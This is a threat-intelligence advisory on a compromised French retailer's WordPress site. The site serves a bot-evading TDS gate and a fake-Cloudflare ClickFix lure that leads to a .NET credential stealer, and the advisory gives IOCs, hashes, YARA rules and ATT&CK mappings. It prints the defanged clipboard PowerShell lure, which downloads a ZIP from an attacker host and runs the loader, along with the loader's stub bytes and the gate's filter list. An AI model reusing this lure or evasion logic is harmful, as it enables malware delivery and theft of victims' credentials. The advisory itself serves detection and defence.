A compromised WordPress host serves a two-component inject: an anti-analysis TDS "gatekeeper" that filters bots and researchers, and a fake-Cloudflare ClickFix that poisons the clipboard to run a PowerShell loader. This release documents an architectural evolution — dual-chain EtherHiding and triple parallel staging — over the same intrusion set.
The legitimate French glasswork retailer verrerie-farinelli.com was compromised and injected with the Omegatech WP-002 delivery kit. Two functionally distinct components run on the page.
Component A — the "gatekeeper-troll" (TDS gate). An injected script fingerprints each visitor by user-agent, referrer and URL, silently bailing on crawlers, scanners and analysis tooling (curl · wget · python · phantomjs · ahrefs · semrush · …) and on WordPress-internal and static-asset requests. Only for apparent human visitors does it base64-decode a failover URL list and inject a next stage via synchronous XHR → document.head. This is the "troll": researchers and bots are routed to nothing (or decoys), never the live payload.
Component B — the actual ClickFix. A fake, multilingual Cloudflare "verify you are human" overlay poisons the clipboard and instructs the visitor to press Win+R, paste, and run a PowerShell one-liner. That command downloads a ZIP, expands it into C:\ProgramData\<16-hex>\, and launches the dropped loader — leading to a CLR-hosted .NET infostealer and browser-credential theft with AES socket exfiltration.
Prior v13.x point-releases tracked new detonation waves and infrastructure rotation within one delivery architecture. This sample changes the architecture, so it earns a major bump.
| Axis | WP-002 rev.4 / v13.x | v14.0 (this sample) |
|---|---|---|
| EtherHiding chains | BSC-testnet only | BSC-testnet + Polygon-mainnet (dual) |
| Staging channels | Single path | Gate-XHR + WebSocket + web3 (triple) |
| Telemetry beacon | Plaintext / n/a | AES-GCM (WebCrypto) to enter-pverif-code[.]info |
| ClickFix delivery | Direct .bin fetch | ZIP-drop (fetch → Expand-Archive → run) |
| Loader family / imphash | Unchanged — MZER Donut loader; durable imphash pivots | |
| Post-exploitation | Unchanged — reflective .NET infostealer, AES socket exfil, LockScreenContentServer persistence | |
| Attribution | Unchanged — infrastructure-level only, AS202412 | |
Decision: same intrusion set & campaign, materially evolved TTPs → v14.0 under WP-001 (not a new series). v13.2 remains defensible if a single continuous IOC thread is preferred.
The clipboard payload delivered to targeted (non-analyst) visitors. Reproduced defanged and annotated as evidence; the live download URL is neutralised so this block is not directly runnable.
# fake progress banner — social-engineering theatre cls; Write-Host "[hh:mm:ss] Starting Cloudflare verification..." # cosmetic $url = 'hxxps://admetricslab[.]org/get_verify?i=16357' # ZIP delivery host $zip = "$env:TEMP\verify_pkg.zip" $dest = 'C:\ProgramData\<16-hex>' # e.g. 2cfadd1cff65ff82 New-Object Net.WebClient + spoofed browser User-Agent → DownloadFile($url,$zip) # if the fetch succeeds, prints "[OK] CloudFlare Services respond" Expand-Archive $zip -DestinationPath $dest -Force cmd /c "`"$dest\1.bat`" `"$dest\LockScreenContentServer.exe`" >nul 2>&1 &" Write-Host "I am not a robot - Cloudflare ID: <16-hex>" # fake reassurance
Disassembly of student_s.bin and the std_enterprise stage confirms the MZER polyglot at the byte level on both branches. The two branches are identical through the stub except for a single byte — the high byte of the add rax displacement.
4D 5A 45 52 'MZER' (MZ-lookalike header at offset 0) E8 00 00 00 00 call $+5 ; GetPC 59 pop rcx ; rcx = RIP 48 83 E9 09 sub rcx, 9 ; rcx -> base of MZER 48 8B C1 mov rax, rcx 48 05 ?? ?? ?? ?? add rax, <imm32> ; student=0x0004C000 · std=0x0000C000 FF D0 call rax ; enter real stage C3 ret # YARA code-anchor (1 wildcard @ offset 21 covers both branches): { 4D 5A 45 52 E8 00 00 00 00 59 48 83 E9 09 48 8B C1 48 05 00 C0 ?? 00 FF D0 C3 }
verify_pkg.zip drops three files. The EXE is a legitimate DUI-host binary used as bait; the malicious code rides in the co-located dui70.dll.
| File | SHA-256 / imphash | Assessment |
|---|---|---|
| LockScreenContentServer.exe | de9d325a… · imphash e441628266… | Legit DUI-host EXE (sideload bait). Matches known hash. |
| dui70.dll | 1a8a1673… · imphash b7b21f8a… | malicious sideload DLL — rotated build |
| 1.bat | hash varies (suffix) | Persistence installer; suffix JQZK2HgoM this build — not a stable IOC |
| verify_pkg.zip | 924906ab… | Delivery package (whole) |
Detonation of both stages resolves what the static disassembly hid — and both resolve their socket and crypto APIs dynamically via GetProcAddress (T1027.007 / T1106), which is precisely why the ZIP-PE static imphashes never fingerprinted the malicious surface.
| Stage | Runtime-confirmed behaviour |
|---|---|
| student_s .NET stealer | Hosts the CLR in-process (loads both v2.0.50727 and v4.0.30319 clr.dll) = reflective .NET. AES via legacy CryptoAPI (CryptAcquireContext → CryptGenKey/CryptImportKey/CryptExportKey/CryptEncrypt, CryptGenRandom IV, CryptHashData). Exfil over Winsock raw socket (ws2_32/wsock32 WSAConnect/send/recv, wship6). |
| std_enterprise native | Native WinHTTP downloader/injector. Winsock (WSAConnect/WSAStringToAddressW/WSASend/WSARecv, mswsock/wshtcpip); proxy-aware via Internet Settings\Connections. Sample SHA-256 6270f38b…. |
The injected svchost (PID 3032) region of the memdump carries the reflectively-loaded stealer. These managed types are present only in the injected svchost (a clean service host does not host them), so they are attributable to the stealer:
| Capability | Memory evidence (svchost-only) |
|---|---|
| AES over raw TCP exfil | AesManaged + TcpClient + NetworkStream + System.Net.Sockets |
| Screen capture new | System.Drawing + Graphics.CopyFromScreen + Bitmap |
| WMI system recon new | WbemScripting.SWbemLocator |
| Reflective load | System.Reflection · <Module> |
| Indicator | Resolves / port | Geo | Role |
|---|---|---|---|
| enter-pverif-code[.]info | 178.16.52.101 | DE | TDS AES-GCM telemetry beacon /api.php |
| dntds[.]shop / sdntds[.]shop | 178.16.53.137 | NL | TDS gate failover stage fetcher /teamrepo |
| ssl.guardhub[.]info | 104.21.89.168 | CF | C2 WebSocket channel wss://…/storage |
| admetricslab[.]org | 91.236.230.87 | — | STAGE ClickFix ZIP drop /get_verify |
| senterprise2026[.]com | 158.94.211.92 | — | STAGE /std branch; /enterprise/student_s.bin |
| — (raw socket) | 158.94.208.92:61120 | — | C2 AES socket exfil (.NET infostealer) |
| viewpublicdocuments[.]com | 194.213.18.38 | — | TDS decoy / redirect hop |
| www.letsdiskuss[.]com | 104.21.20.139 | — | TDS decoy / redirect hop |
| Indicator | Role | Handling |
|---|---|---|
| verrerie-farinelli.com · 164.132.235.17 | Compromised legitimate lure host | splitcam — document, never block |
| bsc-testnet-rpc.publicnode.com · bsc-testnet.bnbchain.org | EtherHiding read (BSC-testnet) | informational |
| rpc-mainnet.matic.quiknode.pro · polygon.drpc.org · polygon-mainnet.public.blastapi.io · polygon.gateway.tenderly.co | EtherHiding read (Polygon-mainnet) | informational |
| www.verrerie-farinelli.fr | Sibling lure host (.fr) — observed in 260806 PCAP | splitcam — document, never block |
| Artifact | Value |
|---|---|
| LockScreenContentServer.exe SHA-256 | de9d325af3156232c34916840210efb5706d6e6a5eba1827c8240e4f71c09fa2 |
| 1.bat SHA-256 | 326525551d91ae03ee6a8e2ec829596d3edf715eb26349b1f3b00e52024ce3c1 |
| dui70.dll (malicious sideload, v14.3) SHA-256 | 1a8a1673fb406038cd77e647377b26041c69eb74223ab347ecdb279f1bdcee14 |
| verify_pkg.zip (package) SHA-256 | 924906ab163fd434abe72d48b1eb20963415f5598134eb0223c8dee1dadca2f6 |
| std_enterprise native stage SHA-256 | 6270f38bdf27aebb108331a484220a8bc0b9a1e6a2c4bba6dad89a2f3665bca5 |
| DUI70.dll (prior build) SHA-256 | 8e19bd310054500eb7e8aa4a64a7adefa3f066296f436b67a9c0972421706ff1 |
| Drop directory | C:\ProgramData\<16-hex>\ (obs. 0968f8a2718d9783, 2cfadd1cff65ff82) |
| Staging ZIP | %TEMP%\verify_pkg.zip |
| Run key | HKCU\...\CurrentVersion\Run\LockScreenContentServer_<8char> |
| Scheduled task | LockScreenContentServer_<8char> (/sc minute /mo 60) |
| Named pipes | CPFATP_* (COR_PROFILER / CLR-profiler abuse) |
| In-memory compile | powershell.exe → csc.exe → cvtres.exe |
| Beacon key (api.php) | 8402fb1338daab6a166e91aa8c92a20798acfa98fb75c5a2 |
Indicators below are split by how they should be reported, to prevent mis-reporting shared or victim infrastructure. Evidence tier: direct = decoded from a lure or observed serving a payload; in-chain = observed in detonation traffic alongside the confirmed chain, role inferred.
| Domain | IP | Role | Evidence |
|---|---|---|---|
| enter-pverif-code[.]info | 178.16.52.101 | AES-GCM telemetry beacon /api.php | direct |
| dntds[.]shop | 178.16.53.137 | TDS stage fetcher /teamrepo | direct |
| sdntds[.]shop | — | Failover of the above | direct |
| admetricslab[.]org | 91.236.230.87 | ClickFix ZIP drop /get_verify | direct |
| senterprise2026[.]com | 158.94.211.92 | /std stage host; served student_s.bin | direct |
| — (raw socket) | 158.94.208.92:61120 | Raw AES socket C2 exfil | direct |
| viewpublicdocuments[.]com | 194.213.18.38 | TDS / redirect hop | in-chain |
| Domain | Resolves to | Role | Handling |
|---|---|---|---|
| ssl.guardhub[.]info | 104.21.89.168 (Cloudflare) | WebSocket C2 wss://…/storage | domain-only |
| www.letsdiskuss[.]com | 104.21.20.139 (Cloudflare) | TDS / redirect hop in-chain | domain-only |
| Indicator | Nature | Handling |
|---|---|---|
| verrerie-farinelli.com · www.verrerie-farinelli.fr 164.132.235.17 | Compromised legitimate WordPress host (victim) | notify owner · never blocklist (splitcam) |
| bsc-testnet-rpc.publicnode.com · bsc-testnet.bnbchain.org | Legitimate BSC-testnet RPC (abused for EtherHiding read) | informational |
| rpc-mainnet.matic.quiknode.pro · polygon.drpc.org · polygon-mainnet.public.blastapi.io · polygon.gateway.tenderly.co · 1rpc.io · polygon-public.nodies.app · polygon-bor-rpc.publicnode.com · rpc.ankr.com | Legitimate Polygon-mainnet RPC (abused for EtherHiding read) | informational |
Companion files ship with this advisory: …-v14.3.yar (11 YARA rules), …-v14.3.sigma.yml (5 behavioral rules), …-v14.3.stix.json (STIX 2.1), and …-v14.3.abuseipdb.csv — all TLP:CLEAR.
| YARA rule | Targets |
|---|---|
| SL_WP001_v14_TDS_Gatekeeper | Gate: bot-UA filter + sync-XHR → head injection |
| SL_WP001_v14_Beacon_ApiPhp | AES-GCM telemetry beacon (api.php) + beacon key |
| SL_WP001_v14_ClickFix_FakeCloudflare | Fake-Cloudflare verify UI (checkbox-verify, Ray ID, Win+R) |
| SL_WP001_v14_WebSocket_Loader | WebSocket stager (guardhub, blob → new Function) |
| SL_WP001_v14_EtherHiding_DualChain | Polygon + BSC-testnet RPC pool / eth_call read |
| SL_WP001_v14_ClickFix_PowerShell_Lure | Captured clipboard PowerShell (ZIP-drop chain) |
| SL_WP001_v14_Host_Persistence | ProgramData 16-hex dir + LockScreenContentServer + 1.bat |
| SL_WP001_v14_Injected_Obfuscation_Idiom | Variant-resilient inject idioms (catches string-encrypted pages) |
| SL_WP001_v14_MZER_GetPC_CodeAnchor | 26-byte MZER header + GetPC stub (1 wildcard, both branches) |
| SL_WP001_v14_ClickFix_Widget_Module | Server-templated fake-Turnstile widget (REPLACE_SERVER, cfm-cb/ray) |
| Tactic | Technique | ID |
|---|---|---|
| Initial Access | Drive-by Compromise | T1189 |
| Execution | User Execution: Malicious Copy & Paste | T1204.004 |
| Execution | PowerShell · Windows Command Shell | T1059.001 · .003 |
| Persistence / Priv-Esc | Registry Run Keys · Scheduled Task | T1547.001 · T1053.005 |
| Defense Evasion | Obfuscated Files/Info · Modify Registry | T1027 · T1112 |
| Defense Evasion | Reflective Code Loading · Process Injection | T1620 · T1055 |
| Persistence / Priv-Esc | Hijack Execution Flow: DLL Side-Loading | T1574.002 |
| Defense Evasion / Execution | Dynamic API Resolution · Native API | T1027.007 · T1106 |
| Defense Evasion | Virtualization/Sandbox Evasion (the gate) | T1497 |
| Command & Control | Web Service (EtherHiding via public RPC) | T1102 |
| Command & Control | Encrypted Channel · Non-Standard Port | T1573 · T1571 |
| Credential Access | Credentials from Web Browsers | T1555.003 |
| Discovery | Browser Info · System Info · System Time | T1217 · T1082 · T1124 |
| Collection / Discovery | Screen Capture · Windows Management Instrumentation | T1113 · T1047 |
Activity is assessed at the infrastructure level only: an unattributed cluster operating on AS202412 ("Omegatech") infrastructure. No named-actor or nation-state assertion is made. Confidence is calibrated to observed artifacts (sandbox behavioral report, PCAP, page captures, process-memory regions).
Handling: TLP:CLEAR — public defensive analysis, freely shareable. Compromised lure hosts and abused public RPC endpoints are documented but excluded from blocklists. Live download URLs are defanged throughout. No payload code, deobfuscated loader, or runnable command is reproduced.